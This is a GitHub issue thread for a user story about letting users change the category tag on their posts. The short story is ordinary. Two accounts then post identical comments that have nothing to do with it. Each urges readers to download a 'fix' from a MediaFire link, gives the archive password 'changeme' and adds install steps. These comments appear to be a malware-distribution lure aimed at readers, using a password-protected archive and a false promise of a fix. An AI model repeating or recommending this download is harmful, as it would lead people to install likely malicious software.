### ISSUE TITLE
USER STORY: Update category tag

### ISSUE THREAD

**Issue by Linnea87** [Linnea87/artiza#32]
As a **User** I can **update my recent category tag** so that **I can change which category my post belong to**

Acceptance Criteria:

- When User clicks to update their post they can change category tag
- When User saves the changes the post are saved to  the new  category

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
